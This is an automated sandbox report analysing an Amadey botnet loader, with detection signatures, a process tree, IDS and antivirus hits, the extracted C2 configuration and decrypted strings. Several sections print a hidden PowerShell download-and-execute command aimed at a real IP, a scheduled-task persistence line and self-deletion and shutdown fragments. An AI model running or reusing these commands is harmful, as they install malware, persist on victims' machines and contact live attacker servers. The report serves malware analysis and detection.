
Windows Analysis Report
uw7A6EF76R.exe

Overview

General Information

Sample name: uw7A6EF76R.exe (renamed because the original name is a hash value)
Original sample name: c0f8159d4a5c70ae8f2c1b650c9d1eab.exe
Analysis ID: 1632960
MD5: c0f8159d4a5c70ae8f2c1b650c9d1eab
SHA1: d26544e533994c05a503381ba74ef773acfd1283
SHA256: 6c7bf3605f290fd134f64a70fb53d2cf9152ff7f8681758c3d525b64d6eba12d
Tags: exe, user-abuse_ch

Detection

Amadey
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Powershell download and execute
Yara detected obfuscated html page
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to start a terminal service
Creates HTA files
Found API chain indicative of sandbox detection
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Potentially malicious time measurement code found
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Uses schtasks.exe or at.exe to add and modify task schedules
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • uw7A6EF76R.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\uw7A6EF76R.exe" MD5: C0F8159D4A5C70AE8F2C1B650C9D1EAB)
    • cmd.exe (PID: 6460 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6724 cmdline: schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • mshta.exe (PID: 6472 cmdline: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 6892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE (PID: 7052 cmdline: "C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE" MD5: 7661F8A27DD998537639F05BE76CD241)
          • rapes.exe (PID: 7000 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: 7661F8A27DD998537639F05BE76CD241)
            • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 5284 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rapes.exe (PID: 5316 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 7661F8A27DD998537639F05BE76CD241)
  • svchost.exe (PID: 7472 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • rapes.exe (PID: 6992 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 7661F8A27DD998537639F05BE76CD241)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Yara matches (Source | Rule | Description | Author):
C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security

Yara matches in memory dumps (Source | Rule | Description | Author):
0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
0000000B.00000002.984343955.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
0000000B.00000003.944161956.0000000005700000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
0000000C.00000002.989946070.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
00000016.00000003.1491050871.0000000004D70000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security

Yara matches in AMSI logs (Source | Rule | Description | Author):
amsi32_6892.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_512.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

                  System Summary

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\uw7A6EF76R.exe", ParentImage: C:\Users\user\Desktop\uw7A6EF76R.exe, ParentProcessId: 6416, ParentProcessName: uw7A6EF76R.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 6460, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\uw7A6EF76R.exe", ParentImage: C:\Users\user\Desktop\uw7A6EF76R.exe, ParentProcessId: 6416, ParentProcessName: uw7A6EF76R.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ProcessId: 6472, ProcessName: mshta.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\uw7A6EF76R.exe", ParentImage: C:\Users\user\Desktop\uw7A6EF76R.exe, ParentProcessId: 6416, ParentProcessName: uw7A6EF76R.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ProcessId: 6472, ProcessName: mshta.exe
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6892, TargetFilename: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE
Source: Process started; Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6460, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 6724, ProcessName: schtasks.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7472, ProcessName: svchost.exe

                  Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe

Suricata IDS alert:
Timestamp: 2025-03-09T13:46:06.094708+0100
SID: 2856147
Severity: 1
Classtype: A Network Trojan was detected
Source IP: 192.168.2.9
Source Port: 49696
Destination IP: 176.113.115.6
Destination Port: 80
Protocol: TCP


                  AV Detection

Source: uw7A6EF76R.exe; Avira: detected
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe; Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE; Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmp; Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source: uw7A6EF76R.exe; Virustotal: Detection: 57%
Source: uw7A6EF76R.exe; ReversingLabs: Detection: 47%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmp; String decryptor (each line below is one decrypted string recovered from this dump):
176.113.115.6
/Ni9kiput/index.php
S-%lu-
bb556cff4a
rapes.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Startup
cmd /C RMDIR /s/q
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
rundll32
Programs
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%USERPROFILE%
cred.dll|clip.dll|
cred.dll
clip.dll
http://
https://
/quiet
/Plugins/
&unit=
shell32.dll
kernel32.dll
GetNativeSystemInfo
ProgramData\
AVAST Software
Kaspersky Lab
Panda Security
Doctor Web
360TotalSecurity
Bitdefender
Norton
Sophos
Comodo
WinDefender
0123456789
Content-Type: multipart/form-data; boundary=----
------
?scr=1
Content-Type: application/x-www-form-urlencoded
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
ComputerName
abcdefghijklmnopqrstuvwxyz0123456789-_
-unicode-
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
SYSTEM\ControlSet001\Services\BasicDisplay\Video
VideoID
DefaultSettings.XResolution
DefaultSettings.YResolution
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
CurrentBuild
rundll32.exe
"taskkill /f /im "
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: " && timeout 1 && del
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: && Exit"
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: " && ren
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Powershell.exe
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: -executionpolicy remotesigned -File "
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: shutdown -s -t 0
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: random
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Keyboard Layout\Preload
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000419
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000422
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000423
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: 0000043f

                  Phishing

                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, type: DROPPED
                  Source: uw7A6EF76R.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: Htem.pdb | source: powershell.exe, 00000008.00000002.1003702720.0000020058B82000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb,V | source: powershell.exe, 00000008.00000002.1004489959.0000020058E30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: em.Core.pdb | source: powershell.exe, 00000008.00000002.1003702720.0000020058B82000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbpdblib.pdb | source: powershell.exe, 00000008.00000002.1003702720.0000020058B82000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00B0DBBE
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00ADC2A2 FindFirstFileExW | 0_2_00ADC2A2
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B168EE FindFirstFileW,FindClose | 0_2_00B168EE
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 0_2_00B1698F
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00B0D076
